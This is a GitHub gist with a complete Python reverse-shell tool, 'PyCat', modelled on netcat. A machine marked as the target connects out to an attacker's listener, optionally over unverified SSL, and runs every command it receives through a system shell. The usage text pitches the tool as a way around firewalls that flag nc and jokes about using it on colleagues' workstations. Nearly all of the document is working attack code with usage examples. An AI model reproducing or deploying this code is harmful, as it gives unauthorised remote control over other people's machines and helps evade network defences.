Skip to content

Instantly share code, notes, and snippets.

@Ludisposed
Last active September 24, 2021 09:54
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save Ludisposed/233343f05b58b899ed72f29e937b05e5 to your computer and use it in GitHub Desktop.
Save Ludisposed/233343f05b58b899ed72f29e937b05e5 to your computer and use it in GitHub Desktop.
#!/usr/bin/env python3
import argparse
import datetime
from functools import wraps
import socket
from ssl import wrap_socket, create_default_context, CERT_NONE
import sys
import subprocess
import tempfile
import os
import re
from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import serialization, hashes
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.backends import default_backend
SUCCESS_RESPONSE = b"Command successfully completed"
def ssl_server(func):
@wraps(func)
def wrapper(inst, *args):
inst.socket.bind((inst.host, inst.port))
inst.socket.listen(0)
if inst.ssl:
inst.context = create_default_context()
inst.key, inst.cert = inst.generate_temp_cert()
inst.socket = wrap_socket(
inst.socket,
server_side=True,
certfile=inst.cert,
keyfile=inst.key
)
func(inst, *args)
return wrapper
def ssl_client(func):
@wraps(func)
def wrapper(inst, *args):
inst.socket.connect((inst.host, inst.port))
if inst.ssl:
inst.context = create_default_context()
inst.context.check_hostname = False
inst.context.verify_mode = CERT_NONE
inst.socket = wrap_socket(inst.socket)
func(inst, *args)
return wrapper
class PyCatBase():
def __init__(self, **kwargs):
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = kwargs['port']
self.host = kwargs['host'] or "0.0.0.0"
self.timeout = kwargs['timeout']
self.ssl = kwargs['ssl']
self.is_windows = os.name == "nt"
self.change_dir_regex = re.compile(r'cd(?:\s+|$)(.*)')
def __enter__(self):
return self
def __exit__(self, *args):
self.socket.close()
return False
def exit(self):
self.socket.close()
sys.exit(0)
def read(self, connection, length=1024):
response = b""
while True:
data = connection.recv(length)
response += data
if len(data) < length:
break
return response.decode("utf-8").rstrip()
@staticmethod
def generate_temp_cert():
_, key_path = tempfile.mkstemp()
_, cert_path = tempfile.mkstemp()
name_attributes = [
x509.NameAttribute(NameOID.COUNTRY_NAME, "OK"),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, "OK"),
x509.NameAttribute(NameOID.LOCALITY_NAME, "OK"),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, "OK"),
x509.NameAttribute(NameOID.COMMON_NAME, "PyCat")
]
key = rsa.generate_private_key(
public_exponent=65537,
key_size=2048,
backend=default_backend()
)
with open(key_path, "wb") as f:
f.write(
key.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.TraditionalOpenSSL,
encryption_algorithm=serialization.NoEncryption()
)
)
subject = issuer = x509.Name(name_attributes)
cert = x509.CertificateBuilder()\
.subject_name(subject)\
.issuer_name(issuer)\
.public_key(key.public_key())\
.serial_number(x509.random_serial_number())\
.not_valid_before(datetime.datetime.utcnow())\
.not_valid_after(datetime.datetime.utcnow() + datetime.timedelta(days=365))
cert = cert.sign(key, hashes.SHA256(), default_backend())
with open(cert_path, "wb") as f:
f.write(
cert.public_bytes(serialization.Encoding.PEM)
)
return key_path, cert_path
class PyCatServer(PyCatBase):
def __init__(self, **kwargs):
super(PyCatServer, self).__init__(**kwargs)
def create_prompt_string(self):
self.client.send(b"cd") if self.is_windows else self.client.send(b"pwd")
pwd = self.read(self.client)
self.client.send(b"whoami")
whoami = self.read(self.client)
self.client.send(b"hostname")
hostname = self.read(self.client)
return f"{whoami}@{hostname} PyCat {pwd}\n$ "
@ssl_server
def main(self):
if self.timeout > 0:
self.socket.settimeout(self.timeout)
self.client, addr = self.socket.accept()
print(f"[*] Incomming connection from {':'.join(map(str, addr))}")
self.handle_client()
def handle_client(self):
while True:
prompt_string = self.create_prompt_string()
command = input(prompt_string)
self.client.send(command.encode("utf-8"))
if command == "exit":
break
print(self.read(self.client))
self.exit()
class PyCatClient(PyCatBase):
def __init__(self, **kwargs):
super(PyCatClient, self).__init__(**kwargs)
def change_dir(self, path):
try:
os.chdir(path)
return SUCCESS_RESPONSE
except FileNotFoundError as e:
return str(e).encode("utf-8")
def exec_command(self, command):
try:
return subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)
except Exception as e:
return str(e).encode("utf-8")
def handle_command(self, command):
if command == "exit":
self.exit()
change_dir = re.match(self.change_dir_regex, command)
if change_dir and change_dir.group(1):
return self.change_dir(change_dir.group(1))
return self.exec_command(command)
@ssl_client
def main(self):
if self.timeout > 0:
self.socket.settimeout(self.timeout)
while True:
cmd = self.read(self.socket)
response = self.handle_command(cmd)
if len(response) > 0:
self.socket.send(response)
def parse_arguments():
parser = argparse.ArgumentParser(usage='%(prog)s [options]',
description='PyCat by @Ludisposed',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=r'''
This is a tiny implementation of nc in Python3.6+
nc is often flagged by firewalls...
but now you can (really) teach your colleagues to lock their workstations! >:)
Features
- SSL encryption
- Multi platform
- Persistent shell
PyCat Commands
- exit
- cd {path}
- (TODO upload/download files)
Examples:
[Encrypted shell]
./pycat.py -lsp 443 [@Attacker]
./pycat.py -si localhost -p 443 [@Target]
[Not Encrypted shell]
./pycat.py -lp 8080 [@Attacker]
./pycat.py -i localhost -p 8080 [@Target]
Example output
$ ./pycat.py -lsp 443
[*] Incomming connection from 127.0.0.1:62135
username@hostname PyCat C:\PyCat\
$ echo hooooi
hooooi
$ cd ../
Command successfully completed
username@hostname PyCat C:\
$ exit
''')
parser.add_argument('-l', '--listen', action="store_true", help='Spawns server, and listens for incomming connections')
parser.add_argument('-s', '--ssl', action="store_true", help='Encrypt connection with SSL')
parser.add_argument('-p', '--port', type=int, help='Port to listen/connect on')
parser.add_argument('-i', '--host', type=str, help='Host to connect to')
parser.add_argument('-t', '--timeout', type=int, default=0, help='Add timeout in seconds')
args = parser.parse_args()
if (args.listen or args.host) and not args.port:
parser.error('Specify which port to connect to')
elif not args.listen and not args.host:
parser.error('Specify --listen or --host')
return args
if __name__ == '__main__':
args = parse_arguments()
pycat_class = PyCatServer if args.listen else PyCatClient
pycat = pycat_class(**vars(args))
with pycat: # Usable with context
pycat.main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment